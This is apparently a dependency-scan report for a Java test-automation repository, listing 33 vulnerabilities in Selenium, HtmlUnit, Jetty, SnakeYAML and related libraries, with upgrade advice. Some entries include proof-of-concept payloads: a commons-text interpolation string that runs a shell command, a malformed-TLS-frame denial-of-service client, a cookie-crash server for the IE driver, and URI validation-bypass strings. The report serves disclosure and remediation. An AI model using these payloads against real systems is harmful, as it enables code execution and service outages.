Vulnerabilities	33 via 305 paths
Dependencies	83
Source	GitHub
Commit	d8d27513

Find, fix and prevent vulnerabilities in your code.

Test and protect my applications

Issue type

Vulnerabilities
33
License issues
2

Severity

Critical
2
High
9
Medium
13
Low
11

Status

Open
35
Patched
0
Ignored
0

critical severity

Remote Code Execution (RCE)

Vulnerable module: net.sourceforge.htmlunit:htmlunit
Introduced through: org.seleniumhq.selenium:htmlunit-driver@2.44.0

Detailed paths

Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:htmlunit-driver@2.44.0 › net.sourceforge.htmlunit:htmlunit@2.44.0

Overview

net.sourceforge.htmlunit:htmlunit is a GUI-Less browser for Java programs

Affected versions of this package are vulnerable to Remote Code Execution (RCE) via XSTL, when browsing the attacker’s webpage.

Note: Users are advised to upgrade to org.htmlunit:htmlunit component v3.0.0 as it contains a fix for this issue.

Remediation

A fix was pushed into the master branch but not yet published.

References

Remote Code Execution (RCE) vulnerability report

critical severity

Arbitrary Code Execution

Vulnerable module: xalan:xalan
Introduced through: org.seleniumhq.selenium:htmlunit-driver@2.44.0

Detailed paths

Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:htmlunit-driver@2.44.0 › net.sourceforge.htmlunit:htmlunit@2.44.0 › xalan:xalan@2.7.2

Remediation: Upgrade to org.seleniumhq.selenium:htmlunit-driver@2.65.0.

Overview

xalan:xalan is a XSLT processor for transforming XML documents into HTML, text, or other XML document types. It implements XSL Transformations (XSLT) Version 1.0 and XML Path Language (XPath) Version 1.0 and can be used from the command line, in an applet or a servlet, or as a module in other program.

Affected versions of this package are vulnerable to Arbitrary Code Execution when processing malicious XSLT stylesheets, due to an integer truncation issue. This allows attackers to corrupt Java class files generated by the internal XSLTC compiler and execute arbitrary Java bytecode.

NOTE: Fixed releases are not expected for the Apache Xalan project, which is being retired.

Remediation

Upgrade xalan:xalan to version 2.7.3 or higher.

References

Arbitrary Code Execution vulnerability report

high severity

Cross-site Request Forgery (CSRF)

Vulnerable module: org.seleniumhq.selenium:selenium-server
Introduced through: org.seleniumhq.selenium:selenium-server@3.141.59

Detailed paths

Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59

Overview

Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) due to the handling of non-JSON content types such as application/x-www-form-urlencoded, multipart/form-data, and text/plain. An attacker can manipulate the server by sending crafted requests that the server executes without proper validation.

Remediation

A fix was pushed into the master branch but not yet published.

References

Cross-site Request Forgery (CSRF) vulnerability report

high severity

Arbitrary Code Execution

Vulnerable module: org.apache.commons:commons-text
Introduced through: org.seleniumhq.selenium:htmlunit-driver@2.44.0

Detailed paths

Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:htmlunit-driver@2.44.0 › net.sourceforge.htmlunit:htmlunit@2.44.0 › org.apache.commons:commons-text@1.9

Remediation: Upgrade to org.seleniumhq.selenium:htmlunit-driver@2.66.0.

Overview

Affected versions of this package are vulnerable to Arbitrary Code Execution via the StringSubstitutor interpolator object. Exploiting this vulnerability is possible when untrusted data flows into the StringSubstitutor.replace() or StringSubstitutor.replaceIn() methods.

Due to the nature of these methods as ones that process application data and not user input, a remote attacker would need prior access to a system in the affected environment positioned to supply such data.

Notes

The Nashorn scripting engine that can be used to exploit this vulnerability was available by default in JDKs up to 14.0.2. As of JDK 15, this vulnerability can only be exploited if another scripting engine has been added, such as JEXL.

Vulnerable lookups:

script - executes expressions using the JVM script execution engine (javax.script)
dns - resolves dns records
url - loads values from urls, including from remote servers

PoC

final StringSubstitutor interpolator = StringSubstitutor.createInterpolator();
String out = interpolator.replace("${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}");
System.out.println(out);

Remediation

Upgrade org.apache.commons:commons-text to version 1.10.0 or higher.

References

Arbitrary Code Execution vulnerability report

high severity

Denial of Service (DoS)

Vulnerable module: net.sourceforge.htmlunit:htmlunit
Introduced through: org.seleniumhq.selenium:htmlunit-driver@2.44.0

Detailed paths

Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:htmlunit-driver@2.44.0 › net.sourceforge.htmlunit:htmlunit@2.44.0

Remediation: Upgrade to org.seleniumhq.selenium:htmlunit-driver@2.70.0.

Overview

net.sourceforge.htmlunit:htmlunit is a GUI-Less browser for Java programs

Affected versions of this package are vulnerable to Denial of Service (DoS). If HtmlUnit runs on user-supplied web pages, an attacker may supply content that causes HtmlUnit to crash by a stack overflow.

Note:

In case the payload is sent to an API endpoint which accepts user-supplied input without sanitization or validation, it is possible to trigger this vulnerability without user interaction.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade net.sourceforge.htmlunit:htmlunit to version 2.70.0 or higher.

References

Denial of Service (DoS) vulnerability report

high severity

Information Disclosure

Vulnerable module: org.codehaus.groovy:groovy
Introduced through: io.rest-assured:rest-assured@4.3.1

Detailed paths

Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › io.rest-assured:rest-assured@4.3.1 › org.codehaus.groovy:groovy@3.0.3

Remediation: Upgrade to io.rest-assured:rest-assured@4.3.3.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › io.rest-assured:rest-assured@4.3.1 › io.rest-assured:json-path@4.3.1 › org.codehaus.groovy:groovy@3.0.3

Remediation: Upgrade to io.rest-assured:rest-assured@4.3.3.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › io.rest-assured:rest-assured@4.3.1 › org.codehaus.groovy:groovy-xml@3.0.3 › org.codehaus.groovy:groovy@3.0.3

Remediation: Upgrade to io.rest-assured:rest-assured@4.3.3.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › io.rest-assured:rest-assured@4.3.1 › io.rest-assured:xml-path@4.3.1 › org.codehaus.groovy:groovy@3.0.3

Remediation: Upgrade to io.rest-assured:rest-assured@4.3.3.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › io.rest-assured:rest-assured@4.3.1 › io.rest-assured:json-path@4.3.1 › io.rest-assured:rest-assured-common@4.3.1 › org.codehaus.groovy:groovy@3.0.3

Remediation: Upgrade to io.rest-assured:rest-assured@4.3.3.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › io.rest-assured:rest-assured@4.3.1 › io.rest-assured:xml-path@4.3.1 › io.rest-assured:rest-assured-common@4.3.1 › org.codehaus.groovy:groovy@3.0.3

Remediation: Upgrade to io.rest-assured:rest-assured@4.3.3.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › io.rest-assured:rest-assured@4.3.1 › io.rest-assured:json-path@4.3.1 › org.codehaus.groovy:groovy-json@3.0.3 › org.codehaus.groovy:groovy@3.0.3

Remediation: Upgrade to io.rest-assured:rest-assured@4.3.3.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › io.rest-assured:rest-assured@4.3.1 › io.rest-assured:xml-path@4.3.1 › org.codehaus.groovy:groovy-xml@3.0.3 › org.codehaus.groovy:groovy@3.0.3

Remediation: Upgrade to io.rest-assured:rest-assured@4.3.3.

…and 5 more

Overview

org.codehaus.groovy:groovy is a language for the JVM

Affected versions of this package are vulnerable to Information Disclosure. Groovy may create temporary directories within the OS temporary directory which is shared between all users on affected systems. This vulnerability only impacts Unix-like systems, and very old versions of Mac OSX and Windows.

Remediation

Upgrade org.codehaus.groovy:groovy to version 2.4.21, 2.5.14, 3.0.7, 4.0.0-alpha-2 or higher.

References

Information Disclosure vulnerability report

high severity

Denial of Service (DoS)

Vulnerable module: org.eclipse.jetty:jetty-http
Introduced through: org.seleniumhq.selenium:htmlunit-driver@2.44.0

Detailed paths

Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:htmlunit-driver@2.44.0 › net.sourceforge.htmlunit:htmlunit@2.44.0 › org.eclipse.jetty.websocket:websocket-client@9.4.32.v20200930 › org.eclipse.jetty:jetty-client@9.4.32.v20200930 › org.eclipse.jetty:jetty-http@9.4.32.v20200930

Overview

org.eclipse.jetty:jetty-http is an is a http module for jetty server.

Affected versions of this package are vulnerable to Denial of Service (DoS) in the MetaDataBuilder.checkSize function. An attacker provide a very large or negative length value for the HTTP/2 HPACK header values. This can lead to an integer overflow, resulting in a very large buffer allocation on the server.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

Two common types of DoS vulnerabilities:

High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade org.eclipse.jetty:jetty-http to version 9.4.53.v20231009, 10.0.16, 11.0.16 or higher.

References

Denial of Service (DoS) vulnerability report

high severity

Denial of Service (DoS)

Vulnerable module: org.eclipse.jetty:jetty-io
Introduced through: org.seleniumhq.selenium:htmlunit-driver@2.44.0

Detailed paths

Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:htmlunit-driver@2.44.0 › net.sourceforge.htmlunit:htmlunit@2.44.0 › org.eclipse.jetty.websocket:websocket-client@9.4.32.v20200930 › org.eclipse.jetty:jetty-io@9.4.32.v20200930

Remediation: Upgrade to org.seleniumhq.selenium:htmlunit-driver@2.49.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:htmlunit-driver@2.44.0 › net.sourceforge.htmlunit:htmlunit@2.44.0 › org.eclipse.jetty.websocket:websocket-client@9.4.32.v20200930 › org.eclipse.jetty.websocket:websocket-common@9.4.32.v20200930 › org.eclipse.jetty:jetty-io@9.4.32.v20200930

Remediation: Upgrade to org.seleniumhq.selenium:htmlunit-driver@2.49.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:htmlunit-driver@2.44.0 › net.sourceforge.htmlunit:htmlunit@2.44.0 › org.eclipse.jetty.websocket:websocket-client@9.4.32.v20200930 › org.eclipse.jetty:jetty-client@9.4.32.v20200930 › org.eclipse.jetty:jetty-io@9.4.32.v20200930

Remediation: Upgrade to org.seleniumhq.selenium:htmlunit-driver@2.49.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:htmlunit-driver@2.44.0 › net.sourceforge.htmlunit:htmlunit@2.44.0 › org.eclipse.jetty.websocket:websocket-client@9.4.32.v20200930 › org.eclipse.jetty:jetty-client@9.4.32.v20200930 › org.eclipse.jetty:jetty-http@9.4.32.v20200930 › org.eclipse.jetty:jetty-io@9.4.32.v20200930

Remediation: Upgrade to org.seleniumhq.selenium:htmlunit-driver@2.49.0.

…and 1 more

Overview

Affected versions of this package are vulnerable to Denial of Service (DoS). CPU usage can reach 100% upon receiving a large invalid TLS frame.

PoC

// server 
public class MyServer {
    public static void startServer() throws Exception {
         SslContextFactory sslContextFactory = new SslContextFactory.Server();
         HttpConnectionFactory httpFactory = new HttpConnectionFactory();
         Server server = new Server();
         ServerConnector connector = new 
         ServerConnector(server,null,null,null,1,-1,AbstractConnectionFactory.getFactories(sslContextFactory ,httpFactory));
         connector.setPort(9988);
         connector.setHost("localhost");
         server.setConnectors(new Connector[]{connector});
         ServletContextHandler context = new ServletContextHandler();
         context.setContextPath("/");
         HandlerCollection handlerCollection= new HandlerCollection();
         handlerCollection.setHandlers(new Handler[]{context,new DefaultHandler()});
         server.setHandler(handlerCollection);
         server.start();
         server.join();
    }
     public static void main(String[] args) throws Exception {
        startServer();
     }
}



public class MyClient {
    // client 
    private static byte[] buildMessage() {
       byte[] bytes = new byte[20005];
       bytes[0] = 22;  // record type
       bytes[1] = 3;   // major version
       bytes[2] = 3;   // minor version
       bytes[3] = 78; // record length 2 bytes
       bytes[4] = 32;  // record length
    
       bytes[5] = 1; // message type
       bytes[6] = 0; // message length 3 bytes
       bytes[7] = 78;
       bytes[8] = 23;
      
      for( int i = 9; i < bytes.length; i++) {
          bytes[i] = 1;
      }
      return bytes;
    }
    
    public static void sendMessage() throws Exception {
        byte[] bytes = buildMessage();
        SocketFactory socketFactory = SocketFactory.getDefault();
        Socket socket = socketFactory.createSocket("localhost",9988);
        socket.getOutputStream().write(bytes);
        socket.close();
    }

    public static void main(String[] args) throws Exception {
        sendMessage();
    }
}

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

Two common types of DoS vulnerabilities:

High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade org.eclipse.jetty:jetty-io to version 9.4.39.v20210325, 10.0.2, 11.0.2 or higher.

References

Denial of Service (DoS) vulnerability report

high severity

NULL Pointer Dereference

Vulnerable module: org.seleniumhq.selenium:selenium-ie-driver
Introduced through: org.seleniumhq.selenium:selenium-java@3.141.59 and org.seleniumhq.selenium:selenium-server@3.141.59

Detailed paths

Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-ie-driver@3.141.59

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.14.1.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-ie-driver@3.141.59
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-ie-driver@3.141.59

Overview

Affected versions of this package are vulnerable to NULL Pointer Dereference due to an insufficient check on CookieWndProc function. An attacker can cause the application to crash by sending specially crafted data that triggers this condition.

PoC

Attacker Server Code

from http.server import BaseHTTPRequestHandler, HTTPServer
from datetime import datetime, timedelta

class CustomHTTPRequestHandler(BaseHTTPRequestHandler):

    def do_GET(self):
        # Send response status code
        self.send_response(200)

        # Send headers
        self.send_header('Content-type', 'text/html')
        # Set the cookie expiration to one day in the future
        expiration_date = (datetime.utcnow() + timedelta(days=1)).strftime('%a, %d %b %Y %H:%M:%S GMT')
        
        well_formed_cookie = f"cookie_name=cookie_value; Domain=127.0.0.1; Path=/; HttpOnly; Expires={expiration_date};"
        self.send_header('Set-Cookie', well_formed_cookie)

        malicious_cookie = f"cookie_name2" #crash
        self.send_header('Set-Cookie', malicious_cookie)

        self.end_headers()

        # Send message back to client
        message = "Hello world!"
        self.wfile.write(bytes(message, "utf8"))
        return

def run():
    print('Starting server...')
    server_address = ('127.0.0.1', 8090)
    httpd = HTTPServer(server_address, CustomHTTPRequestHandler)
    print('Server is running...')
    httpd.serve_forever()

run()

Example Victim Code

from selenium import webdriver
import logging
import time

handler = logging.FileHandler("sel.log")
logger = logging.getLogger('selenium')
logging.basicConfig(level=logging.DEBUG)
logger.setLevel(logging.DEBUG)
logger.addHandler(handler)

options = webdriver.IeOptions()
options.ignore_zoom_level = True
options.ignore_protected_mode_settings = True
options.attach_to_edge_chrome = True
options.initial_browser_url = 'https://selenium.dev'
service = webdriver.IeService(log_file="ie.log", log_level='DEBUG')
driver = webdriver.Ie(options=options,service=service)

driver.set_page_load_timeout(20)
print("Getting the page: ")

try:
    driver.get("http://127.0.0.1:8090/")
except Exception as e:
    print(e)

print("Got the page!")
print("Get Cookies: ")
cookies = driver.get_cookies()
print(cookies)
time.sleep(3)
driver.quit()

Remediation

Upgrade org.seleniumhq.selenium:selenium-ie-driver to version 4.14.1 or higher.

References

GitHub Commit

NULL Pointer Dereference vulnerability report

high severity

Denial of Service (DoS)

Vulnerable module: org.yaml:snakeyaml
Introduced through: org.seleniumhq.selenium:selenium-server@3.141.59

Detailed paths

Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.yaml:snakeyaml@1.19

Overview

org.yaml:snakeyaml is a YAML 1.1 parser and emitter for Java.

Affected versions of this package are vulnerable to Denial of Service (DoS) due to missing nested depth limitation for collections.

NOTE: This vulnerability has also been identified as: CVE-2022-38749

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

Two common types of DoS vulnerabilities:

High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade org.yaml:snakeyaml to version 1.31 or higher.

References

Denial of Service (DoS) vulnerability report

high severity

Denial of Service (DoS)

Vulnerable module: org.yaml:snakeyaml
Introduced through: org.seleniumhq.selenium:selenium-server@3.141.59

Detailed paths

Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.yaml:snakeyaml@1.19

Overview

org.yaml:snakeyaml is a YAML 1.1 parser and emitter for Java.

Affected versions of this package are vulnerable to Denial of Service (DoS) due to missing nested depth limitation for collections.

NOTE: This vulnerability has also been identified as: CVE-2022-25857

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

Two common types of DoS vulnerabilities:

High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade org.yaml:snakeyaml to version 1.31 or higher.

References

Denial of Service (DoS) vulnerability report

medium severity

Uncontrolled Resource Consumption

Vulnerable module: commons-io:commons-io
Introduced through: org.seleniumhq.selenium:htmlunit-driver@2.44.0

Detailed paths

Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:htmlunit-driver@2.44.0 › net.sourceforge.htmlunit:htmlunit@2.44.0 › commons-io:commons-io@2.8.0

Overview

commons-io:commons-io is a The Apache Commons IO library contains utility classes, stream implementations, file filters, file comparators, endian transformation classes, and much more.

Affected versions of this package are vulnerable to Uncontrolled Resource Consumption through the XmlStreamReader class. An attacker can cause the application to consume excessive CPU resources by sending specially crafted XML content.

Remediation

Upgrade commons-io:commons-io to version 2.14.0 or higher.

References

Uncontrolled Resource Consumption vulnerability report

medium severity

Arbitrary Code Execution

Vulnerable module: org.yaml:snakeyaml
Introduced through: org.seleniumhq.selenium:selenium-server@3.141.59

Detailed paths

Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.yaml:snakeyaml@1.19

Overview

org.yaml:snakeyaml is a YAML 1.1 parser and emitter for Java.

Affected versions of this package are vulnerable to Arbitrary Code Execution in the Constructor class, which does not restrict which types can be deserialized. This vulnerability is exploitable by an attacker who provides a malicious YAML file for deserialization, which circumvents the SafeConstructor class.

The maintainers of the library contend that the application's trust would already have had to be compromised or established and therefore dispute the risk associated with this issue on the basis that there is a high bar for exploitation.

Remediation

Upgrade org.yaml:snakeyaml to version 2.0 or higher.

References

Arbitrary Code Execution vulnerability report

medium severity

Improper Validation of Syntactic Correctness of Input

Vulnerable module: org.eclipse.jetty:jetty-http
Introduced through: org.seleniumhq.selenium:htmlunit-driver@2.44.0

Detailed paths

Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:htmlunit-driver@2.44.0 › net.sourceforge.htmlunit:htmlunit@2.44.0 › org.eclipse.jetty.websocket:websocket-client@9.4.32.v20200930 › org.eclipse.jetty:jetty-client@9.4.32.v20200930 › org.eclipse.jetty:jetty-http@9.4.32.v20200930

Overview

org.eclipse.jetty:jetty-http is an is a http module for jetty server.

Affected versions of this package are vulnerable to Improper Validation of Syntactic Correctness of Input via the HttpURI class due to insufficient validation on the authority segment of a URI. An attacker can manipulate the URI parsing to redirect requests or initiate server-side requests to unintended destinations by supplying malformed URIs that bypass validation checks.

Notes:

This is only exploitable if the application uses decoded user data as encoded URIs in conjunction with the HttpURI class used directly;
The Jetty usage of the HttpURI class is not vulnerable.

Workaround

This vulnerability can be mitigated by not passing decoded user data as encoded URIs to any URI class/method, including HttpURI.

PoC

http://browser.check &@vulndetector.com/
http://browser.check #@vulndetector.com/
http://browser.check?@vulndetector.com/
http://browser.check#@vulndetector.com/
http://vulndetector.com\\/

Remediation

Upgrade org.eclipse.jetty:jetty-http to version 9.4.57.v20241219, 12.0.12 or higher.

References

Improper Validation of Syntactic Correctness of Input vulnerability report

medium severity

Denial of Service (DoS)

Vulnerable module: com.squareup.okio:okio
Introduced through: org.seleniumhq.selenium:selenium-firefox-driver@3.141.59, org.seleniumhq.selenium:selenium-java@3.141.59 and others

Detailed paths

Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-firefox-driver@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-firefox-driver@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-firefox-driver@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:htmlunit-driver@2.44.0 › org.seleniumhq.selenium:selenium-support@3.141.59 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:htmlunit-driver@3.55.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-support@3.141.59 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-support@3.141.59 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-chrome-driver@3.141.59 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-chrome-driver@3.141.59 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-edge-driver@3.141.59 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-edge-driver@3.141.59 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-ie-driver@3.141.59 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-ie-driver@3.141.59 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-opera-driver@3.141.59 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-opera-driver@3.141.59 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-safari-driver@3.141.59 › com.squareup.okio:okio@1.14.0

